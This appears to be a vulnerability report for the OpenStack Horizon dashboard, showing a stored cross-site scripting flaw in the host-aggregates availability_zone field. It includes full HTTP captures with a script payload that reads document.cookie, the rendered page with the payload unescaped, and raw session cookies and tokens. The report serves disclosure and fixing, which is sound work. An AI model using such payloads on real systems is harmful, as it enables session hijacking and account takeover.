/admin/aggregates/ is subject to stored cross site scripting issue. The impacted parameter is availability_zone.
For example, here is the request for the update:
POST /admin/aggregates/1/update/ HTTP/1.1
Host: 23.253.125.245
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://23.253.125.245/admin/aggregates/
Content-Length: 192
Cookie: csrftoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK; sessionid=".eJytV1lzG0UQDo5jJ3YuAjEhHDG3wiHNPbvhSgiEACGAyVbpxaWaa7Mi0q5H2nXIw1bBC_-HP8Q7_4KelUQChQ7AerBnZ2e_6e-b7p7un9Zq_1QrOVvlY1McONsriwcuT3axNphTwgQXGGtFIyaUVnFEUiMiitJksxq7Ua9vu7vHjh3TEeWKGMKVwizmaay5xQx-lMeWI-HXku2Ru98v8l6uhu5ucqanqjLrTTGyteTc9LXL7UHRz8vuFYDNyvLgWqdDaJtw2saEtwnj1zhCqHNI2sgfT84BwGHfuHFv8n33FHy21wy_yZ1fTy48sZFWBrjZ5E0gmo9LeGpetqfz7a_co3FZ5O6T6bozAzUue8qU_cN--ejLX2_9_n1yotHH_A0hwG_dC2-2_ImrP_uN2m-2kg1bDFU_9ydrf6qVrPWt37qbrAcB_PbdKjk7tf2mKtWguO9P7_szrdqfbTUkZkKM_bl9f772T7e6J2Fa2WE_T_bu-Avdj-YqFEnJQKGOcpGRPLVpTCVDkdUaE8tTrAnBShDe3QCIiXD-mWy9uwaPYOWzzZnGEY0lFixOGWeWW0WkVQ4pEmOpXKq722F1XrpRrgbBootHYVGgflDpQd8EyJ0jgPTPVap77klFe4N-_mDsL-1312G6fHTg_PPdTRiaYnhQla6Zbo7p8mRYHKqq9i-0MjiKF2v_Uiu70H1hrmGxiEUne-avrphNROWSRQ4zjqWImOIukohyw1KMuTKakuziUuCdZSsqlV3azyaMclc-LEYPssvTp6ocFTlwebnhcqX2u4HLQpHFKiLPoYtjbWKjU2qZYFLzSJmYOh2ZNDJEWZYt8ZnV9l7iJSuBzEQLMXZYDKqhOySgWng0_dxCpBKQ7ZVGtldr_1qQ7aUlvknnqMKoSmPBeapSyqRAEdII0VgJSJ9gpQJVlkPvLF8z43TqsWvDh5ebqA8-DStq_3pD6Y3avxkoXZ6LSeE3h4_UwqhYwPkawRCmilinLMURgQuAaQl8luDuLFkwYxIS1DhQmAzA_Lca8yFtXl1sfkxiMsd8aqlwXHIljGTaOS1TDJdcStI0tRqJheY3uIvMDwtm5p8IGXOo7rvpIdwfqNw4YPF2w-Kd2r8bWFxfdLBx5xC30X8NSCkdQiRCsNgxgmVMGSQeSyS4ImXUAtcj2X3nSGCeDEoLt6RW4yBdkBHy2GFQ7r1GuXbtO0sisika8BxZREog_GBHJiRLtdbMMRUpHklHIiz14oicQi-MyMmaGaGzISIHRWXTYjRUJdiSTa6azKkSWKGGFa49WSU94__qDaFUg2ouNpRBqAoTcwx_IGaxIBYKvRXS8wp7L0_Py0Fmwm38mZ6nITRJziAZbSRjtedBsquLdqSdWdXYuRHKqTnqIMSMUZzGqXLMIBMRzR2WHEdOEJNyUGfVbW6GswYh_tX6GefjoXYx4TaajoCtaNjK2kdLHARI_A8HQUK7SFjDGBfMOqQFtYQ6BMndKh4vcZBV917oICuCzMQ6A0jFyGRuXI7-IbDiRrdrtX9_8XURwaU8TxNiZRQZRA2xLFJSoRiKudRFKbM4bTS5uRA30LmR3LvdW0GYI0KaqXM6qKN_cKZ8Dzqd0SyZjh_206DOB406H9b-o6DO7vwrmVMumxZsjkZEpDiSMTYaWah2kMbGYIpDlnVG6pBPV-jvsp3s-JNXQN-6vIRObFqXPZi2a5VLToyKgRv7j_f9dSgFbkwX9IZuqKHvG9f-E5g6P3WD3qRxKx7mbgSvbk5FaDqrsYNWOPSKk9YNelP_abJpXaqqQek_Szbdjwf9EWx1y8CF5Mr-0G39OfCfJ1ubv53cfu7i001mGheRQLg9_b-VlGbL376657_4Zc9_mWwejIpwEv6r2t9pZVuNcEubma-z7cfWeugi14O5_pvafwsY2dpfXn9XNV3nXrILZVgaM6y1krGwyFqEoC1nUIFCia619N8nG6XLVV76e9mdSlftPwAqQEGv:1XGyHp:Um-2q06zpKC9jj_-kA_gP0kXeAk"; horizon.tabs=%7B%22undefined%22%3A%22%23launch_database__setinstancedetailsaction%22%7D
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
csrfmiddlewaretoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK&name=invisible_to_admin%3Cscript%3Exss%3C%2Fscript%3E&availability_zone=invisible_to_admin%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E
The response is the following:
HTTP/1.1 200 OK
Date: Mon, 11 Aug 2014 22:42:13 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Horizon-Location: /admin/aggregates/
Vary: Cookie
Set-Cookie: sessionid=".eJy1V1l320QULmmWNqEJdKElLA27C9SeXVJZS9kpLaTVOX7J8ZlNlYktZWwppQ86B174Z_wN3vkX3JHlsKW2ywl-SEYazb33--auPy1V7qlWvFlmY50fWNMr8n2bxTtYacwpYYILjJWkIRNSySgkiRYhRUm8Vo7tqNc33Z1Tp06pkHJJNOFSYhbxJFLcYAY_yiPDkXBL8cbIPujnWS-TQ3snPteTZZH2GhnpUrzVbNvMHOT9rOheBbFpURzc6HQIbRNO25jwNmH8BkcIdQ5JG7nT8RYIOOxrO-5NznfPwrHdenk3s245Pv8XRUpqwGbiNwFoNi7gqd5sN-_b39hH4yLP7CfNd-cGclz0pC76h_3i0de_fv77vXil5kf_Q4IXv37f76y7lWs_u9XKrbXiVZMPZT9zZyp3thUv9Y1bvxMvewLcxp0y3mxsvyULOcgfuKf33LlW5TZb3S0AMSVi3Bv0s_2x29qrsR29ds_suWcrd77VPQOvpRn2s3j3trvQ_fCxxIVBwIC4jrShDnhikogGDIVGKUwMT7AiBEtBeHcVREz4dBfT5VrvQakGfe01XDoBDe657hIIAUYu1_4ThTQKsGBRwjgz3EgSGGmRJBEOpE1Ud8N_nRV2lMmBN-LKCRhRyu4yCCkeHVj3fHcNljofHpSFrV_X17Q9WeaHsqzcC610ay8F2l-s3Eut9EL3hceaEIlIdNKLf_fG9NLcExM2eMBCixnHgQiZ5DYMEOWaJRhzqRUl6ZV5gkqZThBltniYj_bT7eapLEZ5BlhenmK5Wrkdj2UmnWIROo-BewJCJ4zgSOlIq4QaJligeCh1RK0KdRJqIg1L5_jDQrpq0nwwHeaDcmgPCbDmH3U_MxCpBGh7ZUrbq5V7zdP20hwvpMewMv_MBDSjMokE54lMKAsECpFCiEZSQJYFJBJAzxVVYzr7p2uD8O06vL1Pw3blXp9CeqNyb3pI24-VSeF3DJ45ByZgAiW0jATcnRYMYSqJsdJQHBIoEkwFAGa2nBqJTxpjD2GyAPPfmpoPmfPabPMjEpEnMr8-MDGfGiosD7gUOmDKWhUkGAphQpIkMQqJmeZ7ObX5Kz6LDeUD21zCg4HMtAUUb09RvFO5dz2Kj2ddbNQ5xG30XwLyRMQ2FxpYhEiIYNMygoOIMshOhgTgrZRRA4ychLajoDRQJZUce-o8jZDHDj1z16fMtSvXmRORdd-AnywimzMTzCIhEH5gFRMBS5RSzDIZSh4GloQ4ULMjciKqBrTpI3KQlybJR0NZgCHppNSkVhaACk1R4cqRRdIz_j_S8wJCm0wFLR90hZGmDMJZ6Ihj-ANxjQUx0DAukJ7n66qJWz1Kz00ITZIzUEanlLHKcU_ZtVkaaWfaOHZu-tbpGHYWPX_L32NDBEJMa8lplEjLNNIhUdzigOPQCqITDkQ8kdga82nf9mlfjZoVoBVTtEHlwjkOAkadvIMsKrThRSgbCqMZ44IZi5SghlCLoAAYyaM5DrKgrpqscyAmH-nUjovRMYEVTXm7Ubn3ZpeLEAruMZzcmnnA23kzvv9lb1FiiAnCUCOqiWGhDCSKoOlLbJgwg5OamBNSWLPztGdH_WB1cR0mndE0mY4f9hPPzvtTdj6o3IeenZ3Hl2ROeVBPYf_mKD3doCMiwWEQYa2QgW4GKaw1pthnUasD5fPlAmPeUQnoG5sVMIk1fdl-M66VNl4Z5QM7dh_tuY-hD7jZfNAb2qGCuW9cuU_g1TONG_Qmg1v-MLMj2LrVkFCPUGMLo7CfFSejG8ym7tN4zdhEloPCfRav2R8P-iNQ9bmGgmSL_tCuHy3cF_H62m9nNi5ferbOTOM8FAi3m__rcaHX3ZfXdt1Xv-y6r-O1g1Hub8J9U7nbrXS9Zmzu4PRtuvGntQ6myGVvrrtbue9ARrr0t-3vy3rq3I13oMVKIoaVkkEkDDIGIRjLGbSW0ForFbh78WphM5kV7n56u1Rl-w8FGkG3:1XGyI9:Z4FqhXc2db7HwwtZeSi0DIW8YRQ"; httponly; Path=/
Set-Cookie: messages="3b207814661220efb902165acec019e6a6d9fbc3$[[\"__json_message\"\0540\05425\054\"Successfully updated aggregate: \\\"invisible_to_admin<script>xss</script>.\\\"\"]]"; Path=/
Content-Length: 0
Content-Type: text/html; charset=utf-8
Age: 0
Via: 1.1 540554-SAT6WWSG03.secops.rackspace.com
The GET request looks like:
GET /admin/aggregates/ HTTP/1.1
Host: 23.253.125.245
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://23.253.125.245/admin/aggregates/
Cookie: csrftoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK; sessionid=".eJy1V1l320QULmmWNqEJdKElLA27C9SeXVJZS9kpLaTVOX7J8ZlNlYktZWwppQ86B174Z_wN3vkX3JHlsKW2ywl-SEYazb33--auPy1V7qlWvFlmY50fWNMr8n2bxTtYacwpYYILjJWkIRNSySgkiRYhRUm8Vo7tqNc33Z1Tp06pkHJJNOFSYhbxJFLcYAY_yiPDkXBL8cbIPujnWS-TQ3snPteTZZH2GhnpUrzVbNvMHOT9rOheBbFpURzc6HQIbRNO25jwNmH8BkcIdQ5JG7nT8RYIOOxrO-5NznfPwrHdenk3s245Pv8XRUpqwGbiNwFoNi7gqd5sN-_b39hH4yLP7CfNd-cGclz0pC76h_3i0de_fv77vXil5kf_Q4IXv37f76y7lWs_u9XKrbXiVZMPZT9zZyp3thUv9Y1bvxMvewLcxp0y3mxsvyULOcgfuKf33LlW5TZb3S0AMSVi3Bv0s_2x29qrsR29ds_suWcrd77VPQOvpRn2s3j3trvQ_fCxxIVBwIC4jrShDnhikogGDIVGKUwMT7AiBEtBeHcVREz4dBfT5VrvQakGfe01XDoBDe657hIIAUYu1_4ThTQKsGBRwjgz3EgSGGmRJBEOpE1Ud8N_nRV2lMmBN-LKCRhRyu4yCCkeHVj3fHcNljofHpSFrV_X17Q9WeaHsqzcC610ay8F2l-s3Eut9EL3hceaEIlIdNKLf_fG9NLcExM2eMBCixnHgQiZ5DYMEOWaJRhzqRUl6ZV5gkqZThBltniYj_bT7eapLEZ5BlhenmK5Wrkdj2UmnWIROo-BewJCJ4zgSOlIq4QaJligeCh1RK0KdRJqIg1L5_jDQrpq0nwwHeaDcmgPCbDmH3U_MxCpBGh7ZUrbq5V7zdP20hwvpMewMv_MBDSjMokE54lMKAsECpFCiEZSQJYFJBJAzxVVYzr7p2uD8O06vL1Pw3blXp9CeqNyb3pI24-VSeF3DJ45ByZgAiW0jATcnRYMYSqJsdJQHBIoEkwFAGa2nBqJTxpjD2GyAPPfmpoPmfPabPMjEpEnMr8-MDGfGiosD7gUOmDKWhUkGAphQpIkMQqJmeZ7ObX5Kz6LDeUD21zCg4HMtAUUb09RvFO5dz2Kj2ddbNQ5xG30XwLyRMQ2FxpYhEiIYNMygoOIMshOhgTgrZRRA4ychLajoDRQJZUce-o8jZDHDj1z16fMtSvXmRORdd-AnywimzMTzCIhEH5gFRMBS5RSzDIZSh4GloQ4ULMjciKqBrTpI3KQlybJR0NZgCHppNSkVhaACk1R4cqRRdIz_j_S8wJCm0wFLR90hZGmDMJZ6Ihj-ANxjQUx0DAukJ7n66qJWz1Kz00ITZIzUEanlLHKcU_ZtVkaaWfaOHZu-tbpGHYWPX_L32NDBEJMa8lplEjLNNIhUdzigOPQCqITDkQ8kdga82nf9mlfjZoVoBVTtEHlwjkOAkadvIMsKrThRSgbCqMZ44IZi5SghlCLoAAYyaM5DrKgrpqscyAmH-nUjovRMYEVTXm7Ubn3ZpeLEAruMZzcmnnA23kzvv9lb1FiiAnCUCOqiWGhDCSKoOlLbJgwg5OamBNSWLPztGdH_WB1cR0mndE0mY4f9hPPzvtTdj6o3IeenZ3Hl2ROeVBPYf_mKD3doCMiwWEQYa2QgW4GKaw1pthnUasD5fPlAmPeUQnoG5sVMIk1fdl-M66VNl4Z5QM7dh_tuY-hD7jZfNAb2qGCuW9cuU_g1TONG_Qmg1v-MLMj2LrVkFCPUGMLo7CfFSejG8ym7tN4zdhEloPCfRav2R8P-iNQ9bmGgmSL_tCuHy3cF_H62m9nNi5ferbOTOM8FAi3m__rcaHX3ZfXdt1Xv-y6r-O1g1Hub8J9U7nbrXS9Zmzu4PRtuvGntQ6myGVvrrtbue9ARrr0t-3vy3rq3I13oMVKIoaVkkEkDDIGIRjLGbSW0ForFbh78WphM5kV7n56u1Rl-w8FGkG3:1XGyI9:Z4FqhXc2db7HwwtZeSi0DIW8YRQ"; horizon.tabs=%7B%22undefined%22%3A%22%23launch_database__setinstancedetailsaction%22%7D; messages="3b207814661220efb902165acec019e6a6d9fbc3$[[\"__json_message\"\0540\05425\054\"Successfully updated aggregate: \\\"invisible_to_admin<script>xss</script>.\\\"\"]]"
Connection: keep-alive
And the response contains the injection XSS payload:
HTTP/1.1 200 OK
Date: Mon, 11 Aug 2014 22:42:14 GMT
Server: Apache/2.4.7 (Ubuntu)
Vary: Accept-Language,Cookie,Accept-Encoding
X-Frame-Options: SAMEORIGIN
Content-Language: en
Set-Cookie: csrftoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK; expires=Mon, 10-Aug-2015 22:42:14 GMT; Max-Age=31449600; Path=/
Set-Cookie: sessionid=".eJy1V1tz20QULmkubUIbWiiXQGm4FQeovXdJBUpLuBQoBUI145eMZ2-qTG0pa0spfdAMvPDT-Bm88y84K8u0MIntMsEPyUqrPed8357rL0uVe6YVny-zsc4PrOkV-QObxdtYacwpYYILjJWkIRNSySgkiRYhRUm8Vo7tqNc33e1Tp06pkHJJNOFSYhbxJFLcYAY_yiPDkXBL8cbI3u_nWS-TQ3s3PteTZZH2GhnpUrzZbNvMHOT9rOheAbFpURxc73QIbRNO25jwNmH8OkcIdQ5JG7nT8SYIOOxrO-5NznfPwrG9evldZt1yfPEJRUpqwGbiqwA0GxfwVG-2m_ftb-yjcZFn9tPmu3MDOS56Uhf9w37x6Ovfv_jzx3il5kf_S4IXv37P76y7lZ1f3Wrl1lrxqsmHsp-5M5U724qX-sat342XPQFu424Zn29s35WFHOT33bP77lyrcudbNYgpEWO3ue-eq9yFVvcMvJZm2M_ivTvuYvfGsQyFQcCAoY60oQ54YpKIBgyFRilMDE-wIgRLQXh3FURMiHPPp8vdDXgElXaUyYHX8cJJ6FjyQo27VDtKFNIowIJFCePMcCNJYKRFkkQ4kDZRNfSDUg362hvw4gkY4F4qZXfzSUZ7g372YOxe3u8uw-vi0YF1r3TXYKnz4UFZ2Pp1fU1bk2V-KMvKvdpK4Speq9zlVnqx--qxhkUiEp30-X-6YvrC3BMThnjAQosZx4EImeQ2DBDlmiUYc6kVJemL8wSVMn15P50gymzxMB89SLeap7IY5Rlgeb3GcqVy2x7LTJLFIiQfAfcEhE4YwZHSkVYJNUywQPFQ6ohaFeok1EQals7xkoV0TUnzMXaYD8qhPSTAmn_U_cxApBKg7Y2atjcr95an7fIc36RHsDL_zAQ0ozKJBOeJTCgLBAqRQohGUkCKBSQSQM8VNcV09rFrg_ytOuq9T8MXlXu7hvRO5a56SFvHyqTwOwLPnAMTMIESWkYC7k4LhjCVxFhpKA4JVAimAgAzW84Uic8lYw9hsgDz363Nh7S5M9v8iETkqcyvD0zMp4YKywMuhQ6YslYFCYYqmJAkSYxCYqb5Xs7U_BWfCofyvm0u4f5AZtoCivdqFO9X7gOP4uasi406h7iN_ktAnojY5kIDixAJEWxaRnAQUQbZyZAAvJUyaoCRk9D2ZFAaqJJKjj11nkbIY4eeuWs1c-3KdeZEZN004KeLyObMBLNICIQfWMVEwBKlFLNMhpKHgSUhDtTsiJyImgI67yNykJcmyUdDWYAt6aTUpFYWgArVqHDlyCLpGf8f6XkBoU2mgn4PWsJIUwbhLHTEMfyBuMaCGOgWF0jP83VNiVv9Oz03ITRJzkAZrSljleOesp1ZGmln2jV2bvl26gh2Fj2_6y-xIQIhprXkNEqkZRrpkChuccBxaAXRCQcinkrsFPNp37toX42aFaAVNdqgcuEcBwGjTt5BFhXa8CKUDYXRjHHBjEVKUEOoRVAAjOTRHAdZUNeUrHMgKR_p1I6L0RGBFdW8Xa_ch7PLRQgF9whOdmce8Hbeiu_d7i1KDDFBGGpENTEslIFEETR9iQ0TZnBSE3NCCqfsPOvZUT9ZXVyDSWc0Tabjh_3Es_NRzc7Hlbvh2dk-viRzyoN6BDuCowUGtwY_EQkOgwhrhQz0O0hhrTHFPs9aHSjIqOnpJ0tA39isgEms6cseNONaaeOVUT6wY_fJvrsJrcCt5oPe0A4VzH3jyn0Kr55r3KA3Gdzyh5kdwdZuQ0I9WY0tjMJ-VpyMbjCbus_iNWMTWQ4K93m8Zn8-6I9A1RcaCpIt-kO7_vfCfRmvr_1xZuOlSxfqzDTOQ4Fwu_m_Hhd63d3e2XNf_bbnvo7XDka5vwn3TeXutNL1mpK5w8y36cZjax1MkcveXPdd5b4HGenSP7Z_KOupcy_ehi4riRhWSgaRMMgYhGAsZ9BdQnetVOB-jFcLm8mscPfSO6Uq238BBl5BxA:1XGyIA:-6Qt3ZZ7PkdNVpPYJOElOMzR-9k"; httponly; Path=/
Set-Cookie: messages=; expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
Content-Type: text/html; charset=utf-8
Content-Length: 14400
Age: 0
Via: 1.1 540554-SAT6WWSG03.secops.rackspace.com
<!DOCTYPE html>
<html>
<head>
<meta content='text/html; charset=utf-8' http-equiv='Content-Type' />
<title>Host Aggregates - OpenStack Dashboard</title>
<link rel="stylesheet" href="/static/dashboard/css/6bf08293a8e0.css" type="text/css" media="screen" />
<link rel="shortcut icon" href="/static/dashboard/img/favicon.ico"/>
<script type="text/javascript" src="/static/dashboard/js/0272dc9e5c21.js"></script>
<script type="text/javascript" charset="utf-8">
/*
Added so that we can append Horizon scoped JS events to
the DOM load events without running in to the "horizon"
name-space not currently being defined since we load the
scripts at the bottom of the page.
*/
var addHorizonLoadEvent = function(func) {
var old_onload = window.onload;
if (typeof window.onload != 'function') {
window.onload = func;
} else {
window.onload = function() {
old_onload();
func();
}
}
}
</script>
</head>
<body id="" ng-app='hz'>
<div id="container">
<div class='topbar'>
<h1 class="brand"><a href="/home/">OpenStack Dashboard</a></h1>
<div class="context-box">
<div id="tenant_switcher" class="dropdown switcher_bar" tabindex="1">
<a class="dropdown-toggle" data-toggle="dropdown" href="#tenant_switcher">
<h3>admin</h3>
</a>
<ul id="tenant_list" class="dropdown-menu">
<li class='divider'></li>
<li><a href="/auth/switch/9b2a33fc33134aae97f530bd9b2da86d/?next=/admin/">demo</a></li>
</ul>
</div>
</div>
<div id="user_info" class="pull-right">
<div id="profile_editor_switcher" class="dropdown switcher_bar" tabindex='1'>
<a class="dropdown-toggle" data-toggle="dropdown" href="#profile_editor_switcher">
<div>admin</div>
</a>
<ul id="editor_list" class="dropdown-menu">
<li class='divider'></li>
<li><a href="/settings/">Settings</a></li>
<li><a href="http://docs.openstack.org" target="_new">Help</a></li>
</ul>
</div>
<a href="/auth/logout/">Sign Out</a>
</div>
</div>
<div id='main_content'>
<div class="messages">
<div class="alert alert-block alert-success fade in">
<a class="close" data-dismiss="alert" href="#">×</a>
<p><strong>Success: </strong>Successfully updated aggregate: "invisible_to_admin<script>xss</script>."</p>
</div>
</div>
<div class='sidebar'>
<div>
<dl class="nav_accordion">
<dt >
<div>Project</div>
</dt>
<dd style="display:none;">
<div><h4><div>Compute</div></h4>
<ul>
<li><a href="/project/" >Overview</a></li>
<li><a href="/project/instances/" >Instances</a></li>
<li><a href="/project/volumes/" >Volumes</a></li>
<li><a href="/project/images/" >Images</a></li>
<li><a href="/project/access_and_security/" >Access & Security</a></li>
</ul>
</div>
<div><h4><div>Network</div></h4>
<ul>
<li><a href="/project/network_topology/" >Network Topology</a></li>
<li><a href="/project/networks/" >Networks</a></li>
<li><a href="/project/routers/" >Routers</a></li>
<li><a href="/project/loadbalancers/" >Load Balancers</a></li>
</ul>
</div>
<div><h4><div>Object Store</div></h4>
<ul>
<li><a href="/project/containers/" >Containers</a></li>
</ul>
</div>
<div><h4><div>Orchestration</div></h4>
<ul>
<li><a href="/project/stacks/" >Stacks</a></li>
</ul>
</div>
<div><h4><div>Databases</div></h4>
<ul>
<li><a href="/project/databases/" >Database Instances</a></li>
<li><a href="/project/database_backups/" >Database Backups</a></li>
</ul>
</div>
</dd>
<dt class="active">
<div>Admin</div>
</dt>
<dd>
<div><h4><div>System Panel</div></h4>
<ul>
<li><a href="/admin/" >Overview</a></li>
<li><a href="/admin/hypervisors/" >Hypervisors</a></li>
<li><a href="/admin/aggregates/" class="active" >Host Aggregates</a></li>
<li><a href="/admin/instances/" >Instances</a></li>
<li><a href="/admin/volumes/" >Volumes</a></li>
<li><a href="/admin/flavors/" >Flavors</a></li>
<li><a href="/admin/images/images/" >Images</a></li>
<li><a href="/admin/networks/" >Networks</a></li>
<li><a href="/admin/routers/" >Routers</a></li>
<li><a href="/admin/info/" >System Info</a></li>
</ul>
</div>
<div><h4><div>Identity Panel</div></h4>
<ul>
<li><a href="/admin/projects/" >Projects</a></li>
<li><a href="/admin/users/" >Users</a></li>
</ul>
</div>
</dd>
</dl>
</div>
</div>
<div id='content_body'>
<div class='page-header'>
<h2>Host Aggregates</h2>
</div>
<div id="host-aggregates">
<div class="table_wrapper">
<form action="/admin/aggregates/" method="POST"><input type='hidden' name='csrfmiddlewaretoken' value='I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK' />
<table id="host_aggregates" class="table table-bordered table-striped datatable">
<thead>
<tr class='table_caption'>
<th class='table_header' colspan='6'>
<h3 class='table_title'>Host Aggregates</h3>
<div class="table_actions clearfix">
<div class="table_search client">
<input class="span3 example" value="" type="text" name="host_aggregates__filter__q" />
<button type="submit" class="btn btn-small btn-search" id="host_aggregates__action_filter">Filter</button>
</div>
<a href='/admin/aggregates/create/' title='Create Host Aggregate' class="btn btn-small ajax-modal btn-create" id="host_aggregates__action_create">Create Host Aggregate</a>
<button class="btn btn-small btn-danger btn-delete" id="host_aggregates__action_delete" name="action" value="host_aggregates__delete" type="submit">Delete Host Aggregates</button>
</div>
</th>
</tr>
<tr>
<th class="multi_select_column"></th>
<th class="sortable normal_column">Name</th>
<th class="sortable normal_column">Availability Zone</th>
<th class="sortable normal_column">Hosts</th>
<th class="sortable normal_column">Metadata</th>
<th class="actions_column">Actions</th>
</tr>
</thead>
<tbody>
<tr class="" data-display="invisible_to_admin<script>xss</script>" data-object-id="1" id="host_aggregates__row__1">
<td class="multi_select_column"><input class="table-row-multi-select" name="object_ids" type="checkbox" value="1" /></td><td class="sortable normal_column">invisible_to_admin<script>xss</script></td><td class="sortable normal_column">invisible_to_admin<script>alert(document.cookie)</script></td><td class="sortable normal_column"></td><td class="sortable normal_column"><li>availability_zone = invisible_to_admin<script>alert(document.cookie)</script></li></td><td class="actions_column"><div class="btn-group"><a href='/admin/aggregates/1/update/' class="btn btn-small ajax-modal btn-edit" id="host_aggregates__row_1__action_update">Edit Host Aggregate</a><a class="btn btn-small dropdown-toggle" data-toggle="dropdown" href="#">
More
<span class="caret"></span></a><ul class="dropdown-menu row_actions clearfix"><li class="clearfix"><a href='/admin/aggregates/1/manage_hosts/' class="btn btn-small ajax-modal btn-create" id="host_aggregates__row_1__action_manage">Manage Hosts</a></li><li class="clearfix"><button class="btn btn-small btn-danger btn-delete" id="host_aggregates__row_1__action_delete" name="action" value="host_aggregates__delete__1" type="submit">Delete Host Aggregate</button></li></ul></div></td>
</tr>
</tbody>
<tfoot>
<tr>
<td colspan="6">
<span class="table_count">Displaying 1 item</span>
</td>
</tr>
</tfoot>
</table>
</form>
</div>
</div>
<div id="availability-zones">
<div class="table_wrapper">
<form action="/admin/aggregates/" method="POST"><input type='hidden' name='csrfmiddlewaretoken' value='I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK' />
<table id="availability_zones" class="table table-bordered table-striped datatable">
<thead>
<tr class='table_caption'>
<th class='table_header' colspan='3'>
<h3 class='table_title'>Availability Zones</h3>
<div class="table_actions clearfix">
<div class="table_search client">
<input class="span3 example" value="" type="text" name="availability_zones__filter__q" />
<button type="submit" class="btn btn-small btn-search" id="availability_zones__action_filter">Filter</button>
</div>
</div>
</th>
</tr>
<tr>
<th class="sortable normal_column">Availability Zone Name</th>
<th class="sortable normal_column">Hosts</th>
<th class="sortable normal_column">Available</th>
</tr>
</thead>
<tbody>
<tr class="" data-object-id="internal" id="availability_zones__row__internal">
<td class="sortable normal_column">internal</td><td class="sortable normal_column"><li>mxindevstack2 (Services Up)</li></td><td class="status_up sortable normal_column">Yes</td>
</tr>
<tr class="" data-object-id="nova" id="availability_zones__row__nova">
<td class="sortable normal_column">nova</td><td class="sortable normal_column"><li>mxindevstack2 (Services Up)</li></td><td class="status_up sortable normal_column">Yes</td>
</tr>
</tbody>
<tfoot>
<tr>
<td colspan="3">
<span class="table_count">Displaying 2 items</span>
</td>
</tr>
</tfoot>
</table>
</form>
</div>
</div>
</div>
</div>
</div>
<div id="footer">
</div>
<script type="text/javascript" src="/i18n/js/horizon/"></script>
<script type="text/javascript" src="/static/dashboard/js/b28ee7422312.js"></script>
<script type="text/html" id="modal_template">
<div class="modal hide">
<div class='modal-header'>
<a class='close' data-dismiss='modal'>×</a>
<h3>{{title}}</h3>
</div>
<div class='modal-body'>
{{body}}
</div>
<div class='modal-footer'>
<a href='#' class='btn btn-primary'>{{confirm}}</a>
<a href='#' class='btn cancel' data-dismiss='modal'>{{cancel}}</a>
</div>
</div>
</script>
<script type="text/html" id="empty_row_template">
<tr class="odd empty"><td colspan="{{colspan}}">{{no_items_label}}</td></tr>
</script>
<script type="text/html" id="alert_message_template">
<div class="alert alert-block fade in alert-{{type}}">
<a class="close" data-dismiss="alert" href="#">×</a>
<p>
<strong>{{type_display}}</strong>
{{#safe}}
{{{message}}}
{{/safe}}
{{^safe}}
{{message}}
{{/safe}}
</p>
</div>
</script>
<script type="text/html" id="spinner-modal">
<div class="modal loading hide">
<p>{{text}}…</p>
</div>
</script>
<script type="text/html" id="membership_template">
<ul class="nav nav-pills btn-group">
<li class="member" data-{{step_slug}}-id="{{data_id}}">
<span class="display_name">{{display_name}}</span>
</li>
<li class="active"><a class="btn btn-primary" href="#add_remove">{{text}}</a></li>
<li class="dropdown role_options">
<a class="dropdown-toggle" data-toggle="dropdown" href="#">
<span class="roles_display">{{roles_label}}</span>
<b class="caret"></b>
</a>
<ul class="dropdown-menu role_dropdown clearfix">
{{#roles}}
<li data-role-id="{{role_id}}"><i class="icon-ok"></i> {{role_name}}</li>
{{/roles}}
</ul>
</li>
</ul>
</script>
<script type='text/javascript' charset='utf-8'>
// Call init on DOM ready.
$(document).ready(horizon.init);
</script>
<div id="modal_wrapper" />
</body>
</html>
I've added an incomplete security advisory task, pending additional feedback/ confirmation from Horizon core security reviewers.